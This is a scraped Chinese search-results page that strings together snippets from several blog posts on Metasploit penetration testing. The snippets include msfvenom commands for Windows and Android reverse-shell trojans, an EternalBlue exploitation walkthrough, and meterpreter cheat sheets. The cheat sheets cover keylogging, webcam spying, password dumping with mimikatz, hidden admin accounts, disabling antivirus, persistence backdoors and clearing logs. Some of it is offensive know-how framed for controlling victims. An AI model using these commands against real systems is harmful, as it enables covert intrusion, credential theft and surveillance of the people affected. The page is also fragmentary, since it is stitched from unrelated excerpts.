精华内容
下载资源
问答
  • msf渗透测测试指南

    2019-02-15 14:33:15
    本书可以帮助渗透测试熟练掌握msf使用方法与技巧,以及各种利用的攻击模块
  • msf 常用命令 1. msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=本机ip LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o 文件名.exe 生成木马 2. msfconsole 3. use exploit/multi/...

    msf 常用命令

                             可渗透win10
    msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=本机ip  LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o 文件名.exe          生成木马
    msfconsole         
    use exploit/multi/handler      利用模块
    show targets                查看这个模块适用于哪些机型
    set payload windows/meterpreter/reverse_tcp     使用该模块
    show options               #查看还需要设置什么
    set lhost 本机ip             #设置本机ip
    exploit                   #攻击
    screenshot             #屏幕截图
    screenshare                #实时观看
    shell                    #打开目标cmd
    keyscan_start               #开启键盘监听
    keyscan_dump            #查看监听记录
    keyscan_stop            #停止监听
    uictl disable keyboard/mouse     #禁用键盘/鼠标
    uictl enable keyboard/mouse     #启用键盘/鼠标制权
    getsystem                 #提权
    upload a.exe  c:/         #上传文件到c:/
    download c:\\a.exe /root/      #下载文件到root目录
    ps                      #查看进程
    kill 2312             #关闭pid为2312的进程
    webcam_list            #列举摄像头
    webcam_snap            #通过远程连接目标系统的摄像头
    run killav                #关闭对方的杀软
    run getgui -e -u Venus -p 123456   #启动rdp新建用户
    net user admin 123456 /add     #新建一个用户名admin 密码123456的用户
    net user admin$ 123456 /add    # 创建一个隐藏用户
    net localgroug administrators admin /add    #加入管理员权限
    run persistence -X -i 5 -p 8888 -r 192.168.1.11  #生成一个持续性后门
    clearev                 #删除日志文件
    cmd 里输入systeminfo命令           #可以查看打了哪些补丁等等
    explorer.exe ::{645FF040-5081-101B-9F08-00AA002F954E}   #打开回收站
    dir c:\ d:\ e:\ /s /b | find "password.txt"        # 全盘搜索文件
    

    拿密码

    进去meterpreter后getuid一下(其实这个也没多大用处,进入meterpreter模式下 大部分情况下是拥有system权限,无需get system,但可能有些权限管理员的不一样)
    1.getuid                获取系统管理员权限
    2.load mimikatz           mimikatz模块
    3.msv                          获取登入密码的hash值
    4.kerberos           获取明文密码拿到登入的明文密码了不过也有一些特殊的情况,例如这样kerberos   不显示哈希值使用另一种方式获取哈希值mimikatz_command -f samdump::hashes跟具上面的方法获取明文密码
    	1. mimikatz_command -f sekurlsa::searchPasswords
    	2. mimikatz_command -f sekurlsa::searchPasswords
    
    更简洁的方法,就是wdigest命令了,这个命令呢,没有上面的复杂,加载模块后直接调用这个wdigest还有一个wdigest一样牛的就是tspkg
    
    展开全文
  • 浅谈MSF渗透测试

    2021-01-27 13:11:47
    渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
  • 使用kali的msf渗透安卓手机

    千次阅读 2021-01-30 21:03:10
    #1# 生成安卓手机木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=(本机ip) LPORT=4444 R > /home/kali/Desktop/111.apk apk生成后会保存在桌面上。 #2# 加载模块 use exploit/multi/handler ...

    #1# 生成安卓手机木马

    msfvenom -p android/meterpreter/reverse_tcp LHOST=(本机ip) LPORT=4444 R > /home/kali/Desktop/111.apk
    

    在这里插入图片描述
    apk生成后会保存在桌面上。

    #2# 加载模块

    use exploit/multi/handler 
    

    在这里插入图片描述
    #3# 选择Payload

    set payload android/meterpreter/reverse_tcp
    

    在这里插入图片描述
    #4# 查看参数并设置

    show options //查看参数
    set LHOST 192.168.189.128 //设置本机ip
    set LPORT 5555 //设置端口
    

    在这里插入图片描述
    #5#

    接下来就是将生成好的apk文件拷贝到手机上去,手机上安装好之后,在控制端输入exploit就可以随心所欲了。

    展开全文
  • 1天会用KALI LINUX MSF渗透框架   二、课程特点        简单易学,可操作易上手!   三、你将学到        MSF渗透框架的使用命令和操作方法   四、适合人员...
  • 3天实战KALI LINUX MSF渗透框架   二、课程特点        注重实战,跟着操作,容易上手学会!   三、你将学到        MSF渗透框架的高级实战使用技巧   四、...
  • 使用 msf 渗透攻击 win7 主机并远程执行命令 文章目录使用 msf 渗透攻击 win7 主机并远程执行命令一、扫描局域网存活的主机并判断是否是目标主机1.1 使用 netdiscover 判断该局域网内 IP网段1.2 使用 nmap 扫描 该...

    使用 msf 渗透攻击 win7 主机并远程执行命令


    实验环境

    • Win7 旗舰版 SP1 -64 位
    • kali Linux 2019.1a
    • Nessus

    一、扫描局域网存活的主机并判断是否是目标主机

    1.1 使用 netdiscover 判断该局域网内 IP网段

    打开命令终端输入

    root@fengzilin53:~# netdiscover
    

    image-20210214183459863

    1.2 使用 nmap 扫描 该网段 判断目标主机

    root@fengzilin53:~# nmap -sS -O 192.168.37.0/24
    

    扫描结果为 主机IP地址为 192.168.37.142 是win7 sp1 与目标主机相同

    image-20210214183813931

    二、通过Nessus 扫描该主机漏洞

    Nessus 安装 可用看这篇博客:https://blog.csdn.net/fengzilin1973/article/details/115964676

    浏览器输入 地址打开 nessus https://192.168.37.138:8834/

    输入用户名及密码 root 123456

    image-20210214185648756

    选择高级扫描

    image-20210214185719402

    输入对应的信息

    image-20210214190024785

    启动nessus

    image-20210214190054447

    扫描结果发现该系统存在 ms17-010

    image-20210214191122524

    三、通过msf模块获取win7主机远程shell

    模块的整体使用流程如下

    07.第七章_Metasploit_ms17_010

    我们通过扫描发现目标是存在 ms17-010 漏洞

    打开终端 进入metasploit 并查询漏洞

    root@fengzilin53:~# msfconsole -q
    msf5 > search ms17-010
    

    image-20210214191336238

    使用 use 命令选中 这个模块 并查看模块需要的配置项

    msf5 > use auxiliary/scanner/smb/smb_ms17_010 
    

    image-20210214191522102

    设置主机IP地址 然后运行

    msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.37.142 
    msf5 auxiliary(scanner/smb/smb_ms17_010) > run
    

    运行之后发现该主机容易受到攻击,也验证了 nessus 扫描的漏洞

    image-20210214191739063

    接下来 查找攻击模块进行

    退出上一个

    msf5 auxiliary(scanner/smb/smb_ms17_010) > back
    

    然后搜索模块并使加载该攻击模块

    msf5 > search ms17-010
    msf5 > use exploit/windows/smb/ms17_010_eternalblue
    

    image-20210214192152743

    查看该模块的配置项

    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 
    

    image-20210214192229080

    设置该配置选项

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.37.142
    

    image-20210214192817015

    查看 exploit target 目标类型

    msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets 
    

    可以看到这个模块只有一个 target,所以默认就选择这个目标系统。不需要手动设置。

    image-20210214193031916

    找一个payload 获取shell 远程连接权限后,进行远程执行命令

    注:payload 又称为 攻击载荷,主要用来建立目标机和攻击机稳定连接的,可返回shell ,也可以进行程序 注入

    msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell type:payload
    

    我们挑选一个 反弹 shell 的 payload

    image-20210214193425234

    设置 payload

    xploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
    

    image-20210214193928464

    查看配置选项

    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
    

    image-20210214193912637

    设置一下本机 payload 监听地址

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.37.138 //本机 IP 
    

    image-20210214194142138

    配置完成后开始执行

    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
    

    image-20210214194622790

    发现已经拿到 win7的权限了 是乱码,

    image-20210214200221844

    解决方案

    更改终端字符编码即可-选择 配置文件首选项

    image-20210214200308727

    选择最后一个-兼容性-编码-传统 CJK 编码 简体中文-GBK

    image-20210214200358396

    效果

    image-20210214200450654

    输入whoami

    发现是系统权限,也就是window 的最高权限

    image-20210214200631456

    ctrl+c 关闭链接

    y

    image-20210214200748437

    通过会话进行连接目标机

    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
    

    -j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机。

    image-20210214201011706

    msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions 
    

    image-20210214201027599

    通过会话 ID 进入会话

    image-20210214201137013

    或者使用 background 退出会话将会话保存到后台并查看

    C:\Windows\system32>background
    
    Background session 2? [y/N]  y
    msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions 
    

    image-20210214201247437

    根据ID结束会话

    msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2
    

    image-20210214201413445

    总结

    总结使用 metasploit 攻击的步骤

    1. 查找 CVE 公布的漏洞
    2. 查找对应的 exploit 模块
    3. 配置模块参数
    4. 添加 payload 后门
    5. 执行 exploit 开始攻击
    展开全文
  • msf 渗透测试

    2017-06-05 14:45:30
    msf渗透
  • kali之msf渗透测试

    千次阅读 2020-07-10 22:15:25
    kali之msf渗透测试 1.metasploit介绍、安装、更新、目录结构 1.metasploit介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、...

    kali之msf渗透测试

    1.metasploit介绍、安装、更新、目录结构

    1.metasploit介绍

    Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。Metasploit就是一个漏洞框架。

    2.MSF安装要求

    硬盘空间:
    至少10G,个人建议50G;由于分区时用FAT32类型不支持大文件运行,所以分区建议使用NTFS、EXT3类型分区,

    内存:
    建议2G及以上

    处理器:
    处理器要求较低,市面上电脑均可满足要求,处理速度大于500HZ即可

    网络设备
    虚拟机中桥接即可,也可以自己配置IP,无线网络需要外接无线网卡

    软件:
    KALI 和其他测试系统

    虚拟机:
    必备:需安装kali和各种测试系统

    Kali:
    下载地址:http://www.kali.org/downloads/
    升级指令:“apt-get update && apt-get upgrade”

    Metasploitable系统:
    它包含Linux系统中大大小小的漏洞,很适合做测试系统。
    下载地址:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
    下载之后发现是zip格式的,直接解压用vm打开就可以。

    3.MSF更新

    1.替换yum源,将原有源用#注释掉。
    vi /etc/apt/sources.list
    kali官方源
    #deb http://http.kali.org/ kali-rolling main non-free contrib
    #deb-src http://http.kali.org/ kali-rolling main non-free contrib
    #中科大源
    deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
    deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
    保存退出即可

    注意(vi编辑之保存—退出)
    按ESC键 跳到命令模式,然后:
    :w 保存文件但bai不退出vi
    :w file 将修改另外保存到file中,du不退出vi
    :w! 强制保存,不推zhi出vi
    :wq 保存文件并退出vi
    :wq! 强制保存文件,并退出vi
    q: 不保存文件,退出vi
    :q! 不保存文件,强制退出vi
    :e! 放弃所有修改,从上次保存文件开始再编辑
    2.添加数字签名
    wget archive.kali.org/archive-key.asc //下载签名
    apt-key add archive-key.asc //安装签名
    注:如果添加数字签名还提示无法安装可删除原有msf
    root@kali:~# apt remove metasploit-framework
    注:卸载过程中无法获得锁 /var/cache/apt/archives/lock - open (11: 资源暂时不可用)
    无法对目录 /var/cache/apt/archives/ 加锁
    root@kali:~# sudo rm /var/cache/apt/archives/lock //进行强制解锁
    root@kali:~# sudo rm /var/cache/apt/archives/

    3.安装msf框架
    root@bogon:~# apt-get update
    root@kali:~# apt-get install metasploit-framework //安装msf框架
    root@kali:~#msfconsole //发现有提示数据库未启动,退出msf启动数据库
    root@kali:~# systemctl start postgresql //启动数据库
    root@kali:~# systemctl enable postgresql //允许开机自启动
    root@kali:~# msfdb init //构建数据库缓存
    root@kali:~#msfconsole
    注意
    如果更新完msf出现才下问题
    root@kaliew:~# msfconsole
    [] Bundler failed to load and returned this error:
    ‘cannot load such file – bundler/setup’
    [
    ] You may need to uninstall or upgrade bundler
    解决方法:
    root@kaliew:~# sudo gem install bundler
    root@kaliew:~# bundle update celluloid

    4.MSF目录结构

    MSF 在BT5下存放目录
    /opt/MSF

    MSF Kali下存放目录
    /usr/share/MSF-framework/

    漏洞框架地址
    /usr/share/metasploit-framework/

    各种模块几乎都在这里
    cd modules

    Auxiliary
    主要包含渗透测试中一些辅助性的脚本,这些脚本功能有扫描,嗅探,破解,注入,漏洞挖掘等

    Encoders
    各种编码工具,用于躲过入侵检测系统和过滤系统

    Exploit
    包含了exp,0day,各种漏洞利用脚本,主要攻击代码都存在这里
    命名规则 系统/服务/模块、在使用exp时可以按照这个命名方法找
    比如:use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名)

    Nops
    用于绕过IDS IPS,生成脚本

    Payloads
    是攻击者发送给系统执行的指令。
    命名规则:系统/类型/名称 比如: use payloads/windows/shell/bind_tcp
    payloads与exploits区别:payloads在目标机执行、exploits在本地机执行作用与目标机。

    Post
    这个目录存放MSF中exploits执行成功之后,向目标机发送的一些功能性指令,比如提权、获取hash

    Data
    这个目录里盛放了Meterpreter、PassiveX、Vnc、DLLs等这些工具和一些用户接口代码,Msfweb 和一些其他模块用到的数据文件。

    Plugins
    模块用户需要使用load来加载,提供插件,例如数据库连接插件

    Scripts
    这个目录下文件大都是Meterpreter这个模块利用的脚本

    tools
    包含一些有用的脚本和零散的工具

    2.MSF专业术语讲解

    1.Exploit(渗透攻击)

    渗透攻击是指由攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。
    流行的攻击技术包括:缓冲区溢出、Web应用程序漏洞攻击,以及利用配置错误等。

    2.Paylod攻击载荷(攻击载荷)

    攻击载何是我们期望目标系统在被渗透攻击后而执行的代码。在MSF框架中可以自由的选择、传送和植入。比如,反弹式shell是一种从目标主机到攻击主机创建网络连接,并提供命令行shell的攻击载荷。bind shell攻击载荷则在目标主机上将命令行shell绑定到一个打开的监听端口,攻击者可以连接这些端口来取得shell交互。

    3.Shellcode(溢出代码)

    shellcode是在渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常用汇编语言编写。在大多数情况下,目标系统执行了shellcode这一组指令后,才会提供一个命令行shell或者Meterpreter shell,这也是shellcode名称的由来。

    4. Module(模块)

    在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。在某些时候,你可能会使用一个渗透攻击模块(Exploit module),也就是用于实际发起渗透攻击的软件组件。而在其它时候,则可能使用一个辅助模块(auxiliary module),用来扫描一些诸如扫描或系统查点的攻击动作。

    5. Listener(监听器)

    监听器是MSF中用来等待连入网络连接的组件。举例来说,在目标主机被渗透攻击之后,它可能会通过互联网回连到攻击主机上,而监听器组件在攻击主机上等待被渗透攻击的系统来连接,并负责处理这些网络连接。

    3.MSF基本命令

    用?可以浏览所有命令:帮助菜单
    msfconsole
    打开控制台
    search
    搜索命令或模块,如:search ms08-067
    Use
    执行命令、利用模块,如:use exploit/windows/smb/ms08_067_netapi
    back
    从当前环境返回
    info
    查看模块信息,如:info exploit/windows/smb/ms08_067_netapi
    check
    检测
    banner
    显示MSF相关信息
    connect+网址+端口
    连接一个主机,如:connect www.baidu.com 80
    exit/quit
    退出控制台
    irb
    进入irb脚本模式
    jobs
    显示并管理作业(与Windows中的任务管理器一样)
    kill
    结束作业,杀死一个进程(与结束进程作用一样)
    loadpath
    加载一个模块路径
    load
    加载一个插件
    resource
    运行储存一个文件中的命令
    route
    查看一个会话路由信息
    save
    保存动作
    set
    给变量复制,如:set RHOST 192.168.1.0
    show
    显示给所有类型的模块,如:show options
    setg
    把一个赋值给全局变量
    例如set设置IP,就会用到其他共计模块的RHOST中
    sleep
    在限定的秒数内什么也不做
    unload
    卸载一个模块
    unset
    解出一个或者多个变量,如:unset RHOST
    unsetg
    解出一个或者多个全局变量
    version
    显示MSF和控制台库版本

    4.exploits和payloads模块

    1.exploits模块

    命名规则:系统/服务/名称
    例如:windows/smb/ms08_067_netapi

    RHOST:目标主机IP地址 如:set rhost 192.168.0.1
    RPORT:目标主机连接端口 如:set rport 80
    LHOST:攻击者的IP地址 如:set lhost 192.168.0.1
    LPORT:攻击者的端口 如:set lport 80
    Payload:有效的载荷,成功后返回shell 如:set payload windows/meterpreter/bind_tcp

    2.payloads模块

    是在使用一个模块之后再去使用的。
    命名规则:系统/类型/名称
    例如:Windows/dllinject/reverse_tcp
    类型命名规则
    shell:上传一个shell。
    dllinject:注入一个dll到进程。
    patchup***:修补漏洞。
    upexec:上传并执行一个文件。
    meterpreter:高级的payload。
    vncinject:高级的payload。
    passive:高级的payload。
    名称的命名规则
    shell_find_tag:在一个已建立的连接上创建一个shell。
    shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。
    bind_tcp:监听一个tcp连接。
    reverse_tcp:反向建立tcp连接。
    reverse_http:通过HTTP隧道通信并创建一个新用户添加到管理组。
    add_user:创建一个新用户并添加到管理组。
    xxx_ipv6_tcp:基于IPV6。
    xxx_nonx_tcp:no execute或win7(NX是应用在CPU的一种可以防止缓冲区溢出的技术)。
    xxx_ord_tcp:有序payload。
    xxx_tcp_allports:在所有可能的端口。

    5.MSF简单基本的使用流程:

    在kali命令窗口输入Msfconsole启动MSF

    Search +漏洞号码来查找漏洞,输出结果会有该漏洞相应的利用模块

    Use+漏洞模块进入模块

    Info查看该漏洞利用的相关信息(作者信息、可攻击的系统等等)

    Show options看一下需要设置那些东西 如攻击IP地址‘、端口号等

    Set 根据show options输出的信息进行设置漏洞set
    如;set payload、set rhost\rport、set lhost\lport、set target、等等
    Check检测是否存在漏洞
    Exploit或run开始攻击
    看攻击效果:session -I 有会话则成功。

    6.MSF辅助模块

    1.Auxiliary辅助模块

    1.Whois信息探测:

    查看域名信息
    Whois www.baidu.com
    查看IP信息
    Whois 192.168.1.100

    2.利用辅助模块查找邮箱

    use auxiliary/gather/search_email_collector 进入查找邮箱模块

    show options 查看需要设置什么东西

    set domain www.baidu.com 设置一个域名

    set search_google false 由于google被国内封了,所以关了它

    run 运行

    3.使用auxiliary模块下的DNS枚举模块:

    use auxiliary/gather/enum_dns 进入DNS枚举模块

    show options 查看需要设置什么东西

    set domain baidu.com 设置一个域名
    注意:要设置顶级域名不要加www,不然爆破的时候就是xxx.www.baidu.com了

    Run 运行

    4.端口扫描模块

    1.内置namp 扫描
    Namp -sV 192.168.1.100

    2.syn扫描
    use auxiliary/scanner/portscan/syn 进入syn扫描

    show options 查看需要设置什么东西

    set rhost 192.168.1.100 设置目标地址

    set threads 100 设置线程(默认为1,这里设置为100)

    run 运行
    扫描原理:
    扫描器向目标主机的一个端口发送请求连接的SYN包,扫描器在收到SYN/ACK后,不是发送的ACK应答而是发送RST包请求断开连接。这样,三次握手就没有完成,无法建立正常的TCP连接,因此,这次扫描就不会被记录到系统日志中。这种扫描技术一般不会在目标主机上留下扫描痕迹。但是,这种扫描需要有root权限。

    TCP connect端口扫描服务端与客户端建立连接成功(目标端口开放)过程:
    ① Client端发送SYN;
    ② Server端返回SYN/ACK,表明端口开放;
    ③ Client端返回ACK,表明连接已建立;
    ④ Client端主动断开连接。

    TCP connect端口扫描服务端与客户端未建立连接成功(目标端口关闭)过程:
    ① Client端发送SYN;
    ② Server端返回RST/ACK,表明端口未开放。

    端口开放:
    1、Client发送SYN ;
    2、Server端发送SYN/ACK ;
    3、Client发送RST断开(只需要前两步就可以判断端口开放)。
    端口关闭:
    1、Client发送SYN ;
    2、Server端回复RST(表示端口关闭)。

    优点:
    SYN扫描要比TCP Connect()扫描隐蔽一些,SYN仅仅需要发送初始的SYN数据包给目标主机,如果端口开放,则相应SYN-ACK数据包;如果关闭,则响应RST数据包;

    3.tcp扫描
    use auxiliary/scanner/portscan/tcp 进入tcp扫描

    show options 查看需要设置什么东西

    set rhost 192.168.1.100 设置目标地址

    set threads 100 设置线程(默认为1,这里设置为100)

    run 运行

    5.服务版本信息探测

    1.smb版本扫描
    use auxiliary/scanner/smb/smb_version 进入SMB扫描

    show options 查看需要设置什么东西

    set rhost 192.168.1.100 设置目标地址

    run 运行
    2…ssh 版本扫描
    use auxiliary/scanner/ssh/ssh_version 进入ssh 版本扫描

    show options 查看需要设置什么东西

    set rhost 192.168.1.100 设置目标地址

    set threads 100 设置线程(默认为1,这里设置为100)

    run 运行
    3.ftp版本扫描
    use auxiliary/scanner/ftp/ftp_version 进入ftp版本扫描

    show options 查看需要设置什么东西

    set rhost 192.168.1.100 设置目标地址

    set threads 100 设置线程(默认为1,这里设置为100)

    run 运行

    7.meterpreter后期攻击使用方法

    1:上传文件到Windows主机
    简单来说,你可以上传本机的任意文件到远程目标主机中。
    命令:
    upload <file文件> <destination目的地>
    注意:使用-r参数可以递归上传上传目录和文件
    正确输文件的方法是:upload //root//123.exe c:\123.exe

    2:从windows主机下载文件
    download命令可以下载远程主机上的文件
    命令:
    download <file文件> <path to save要保存的路径>
    注意:Windows路径要使用双斜线
    如果我们需要递归下载整个目录包括子目录和文件,我们可以使用download -r命令

    3:在目标主机上执行exe文件
    我们也可以使用execute命令在目标主机上执行应用程序
    语法也非常简单
    命令:
    execute -f <path路径> [options]
    正确写法是: execute -f c://1.exe

    4:创建CMD新通道
    如果你想在目标主机上执行命令提示符,你可以使用下列命令:
    命令:
    execute -f cmd -c

    5:显示进程
    ps命令会显示目标主机上所有正在运行的进程
    命令:
    ps

    6:获取目标主机的cmd shell
    shell命令可以进入目标主机的cmd
    命令:
    shell

    7:获取admin权限
    getsystem命令可以提权到本地系统权限
    命令:
    getsystem

    8:使用Hashdump转储所有hash值
    我们可以使用meterpreter shell来dump目标主机的当前系统账户和密码。转储的内容是NTML哈希格式,网上有很多工具和技巧来破解它们。
    NTLM在线破解:https://hashkiller.co.uk/ntlm-decrypter.aspx
    命令:
    hashdump
    输出的每一行内容格式如下
    Username:SID:LM hash:NTLM hash:::

    9:使用Credcollect转储hash值
    还有一个类似的脚本叫credential_collector,也可以收集目标主机的tokens
    命令:
    run credcollect

    10:创建端口转发
    meterpreter shell中的portfwd命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机。
    add选项会将端口转发添加到列表中,而且本质上会创建一个隧道。
    请注意:这个隧道存在于meterpreter控制台之外,任何终端会话都可以使用。
    命令:
    portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

    rdesktop 127.0.0.1:6666

    11:删除端口转发
    跟创建端口转发命令类似,这条命令是删除一条端口转发记录
    命令:
    portfwd delete -l -p -r
    如:portfwd delete -l 1337 -p 1337 -r 192.168.1.100

    如果你想显示所有端口转发记录,你可以使用portfwd list命令,如果你想删除所有的记录,可以使用portfwd flush命令
    12:在目标主机上搜索文件
    搜索命令可以来定位查找目标主机上的特定文件。这个命令可以搜索整个文件系统,也可以搜索特定的文件夹。
    例如,如果你想搜索目标主机上的所有txt文件,可以使用下列命令:
    命令:
    search -f *.txt

    13:获取用户ID
    getuid命令会显示主机上运行meterpreter 服务的用户
    命令:
    getuid

    14:获取系统信息
    sysinfo命令会显示系统名,操作系统,架构和语言等。
    命令:
    sysinfo

    15:模拟任意用户(token操作)
    这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助,因为在微软活动目录中,本地访问权限并没多大用,但是如果能搞到凭证尤其是管理员凭证,那就非常有用了。
    incognito最开始是一个独立的应用,当你成功入侵系统后可以用它来模拟用户tokens。这个应用后来集成到了metasploit,并且最终集成到了meterpreter中,使用如下:
    在meterpreter会话中加载这个模块非常简单,只要输入 use incognito命令即可
    输入list_tokens -u来显示所有有效的tokens
    然后我们需要模拟某个token来获取其权限。还有注意,如果成功模拟了一个token,我们可以使用getuid命令来检查当前用户ID

    getuid
    use incognito
    list_tokens -u
    impersonate_token “Machine\user”

    16:webcam摄像头命令
    webcam_list 查看摄像头
    webcam_snap 通过摄像头拍照
    webcam_stream 通过摄像头开启视频

    17:execute执行文件
    execute 在目标机中执行文件
    execute -H -i -f cmd.exe 创建新进程cmd.exe,-H不可见,-i交互

    18:timestomp伪造时间戳
    timestomp C:// -h 查看帮助
    timestomp -v C://2.txt 查看时间戳
    timestomp C://2.txt -f C://1.txt 将1.txt的时间戳复制给2.txt

    19:enable_rdp脚本开启3389
    run post/windows/manage/enable_rdp 开启远程桌面
    run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 添加用户
    run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 将3389端口转发到6662
    脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
    通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令

    20:键盘记录
    keyscan_start 开始键盘记录
    keyscan_dump 导出记录数据
    keyscan_stop 结束键盘记录

    其它详细见: https://xz.aliyun.com/t/2536

    展开全文
  • 记一次msf渗透win10

    2020-11-06 01:43:29
    KALI IP 192.168.186.141 WIN 10 192.168.186.131 生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe LHOST 本地的IP地址 LPORT 反向连接到主机的端口 ...
  • 使用msf进行渗透测试,这个框架在kali里面是自带的,如果是想在Windows里面则需要自己安装框架。 本次除了kali作为攻击机之外,还下载了meteasploitable靶机作为被攻击机,因为其中操作系统比较古老,漏洞比较多,...
  • kali利用metasploit使用ms17-010(永恒之蓝)渗透靶机...4.使用命令msfconsole打开msf 5.使用search ms17-010命令查找攻击模块 6.使用exploit/windows/smb/ms17_010_eternalblue模块攻击 use选择 7.show options
  • 5天入门和实战KALI LINUX MSF渗透框架   二、课程特点        注重实战,跟着操作,容易上手学会!   三、你将学到        MSF渗透框架的入门与实战使用技巧 &...
  • 我们一般都是在Kali安装的MSF 但是我们用手机安装Kali的时候镜像非常难下载 所以我们可以使用Ubuntu安装MSF wget ...
  • 1.kali桌面超时的设置方法 鼠标右击选择应用程序-设置-light桌面管理器-杂项,设置为从不。 2.物理机与虚拟机在同一个网络一般使用桥接模式。 3.渗透攻击:是指
  • MSF渗透Win server 2008 R2

    千次阅读 2020-11-15 11:02:26
    详细步骤信息收集漏洞探测漏洞利用权限提升权限维持远程桌面痕迹清除 信息收集 使用nmap工具进行扫描,发现发现开放了445端口,尝试利用MS17_010漏洞。 nmap –sV 目标主机IP地址 漏洞探测 2. 1查看漏洞模块 ...
  • 攻击载荷(payloads)和后渗透模块(posts),以及空字段模块(nops)和编码模块(encoders) msfvenom        #集成了msfpayload和msfencode的功能,效率更高,替代了msfpayload和msfencode plugins       ...
  • msf渗透实验基本操作(上)

    千次阅读 2021-11-23 18:23:26
    (3)Metasploit后渗透攻击 (4)Metasploit内网攻击 2.基本要求 (1)掌握Metasploit架构及使用流程; (2)掌握Metasploit主机扫描、漏洞利用; (3)掌握Metasploit后渗透攻击技术; (4)掌握Metasploit...
  • 环境:kali Linux 和metasploitalbe metasploitable下载后解压即可打开运行 smba是一款免费的在linux和unix共享文件夹的软件,其中的SMB协议是通信协议 在msfconsole中输入 search samba 查看相关漏洞利用模块 ...
  • 关于使用msf渗透攻击Win7主机并远程执行命令的复习 一、关于环境的搭建 攻击机:kali 靶机:win7 旗舰版 sp1 win版本这里最好就下载我所指出的版本,因为其他版本由于系统和补丁不同可能会出现漏洞无法利用情况 ...
  • 利用msf渗透测试永恒之蓝漏洞详细教程 1、打开kali,利用msf(系统默认已经安装)渗透框架进行攻击测试 2、查找永恒之蓝对应的模块 3、利用辅助模块(auxiliary)进行探测信息(在第二步已经查找出来所有与之相关...
  • 利用MSF渗透框架破解Mysql数据库用户名和密码 前言: 各位大佬小弟初来乍到,步入大二上的时候去看了一些网络界的前辈、大佬们的教程做了一些笔记,将陆陆续续拿出来分享一下,有错误的地方希望大家可以帮我纠正一下...
  • Kali利用MSF渗透Win 7获取shell

    千次阅读 2019-09-13 23:09:21
    进行渗透: exploit 在Win 7上点击该setup.exe后,会自动获取Meterperter会话 输入shell,获取命令行 输入dir,获取目录 发现这些都有乱码,不能忍啊。。使用命令: chcp 65001 ...
  • 1.什么是永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的...2.通过msf模块获取win7主机远程shell 模块的整体使用流程如下
  • msf渗透安卓机

    2019-05-29 17:18:00
    /*metasploit之远控*/msfconsole //开启metasploit模块/*根据自己的IP生成一个木马*/msfvenom -p 系统/meterpreter/reverse_tcp LHOST=IP LPORT = 端口 R> 文件名.exe(安卓.apk) use expolit/multi/handler //...
  • kail之MSF渗透测试

    千次阅读 2020-03-29 11:10:55
    本文目录kail之MSF渗透测试实战kail问题解答及msf初识什么是MSF专业术语基本使用目录结构如何更新MSF基本命令MSF渗透测试一MSF渗透测试二MSF渗透测试三MSF后期攻击使用方法(渗透测试4~6)MSF渗透测试七MSF渗透测试...
  • msf渗透

    千次阅读 2020-07-19 21:57:45
    主要内容 首先构造一个payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe ...先返回msf,保留session
  • MSF渗透实验

    2021-08-11 20:22:45
    浏览器攻击渗透(MS10_018) 环境: 1、虚拟机Windows2003系统(靶机) 2、虚拟机linux2020.2(攻击机) 步骤: 一、启动虚拟机linux2020.2,终端输入msfconsole启动 二、输入指令search ms10_018查看一下,这是...
  • msf渗透平台

    2019-08-26 16:02:12
    msf渗透平台 ** show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找...

空空如也

空空如也

1 2 3 4 5 ... 20
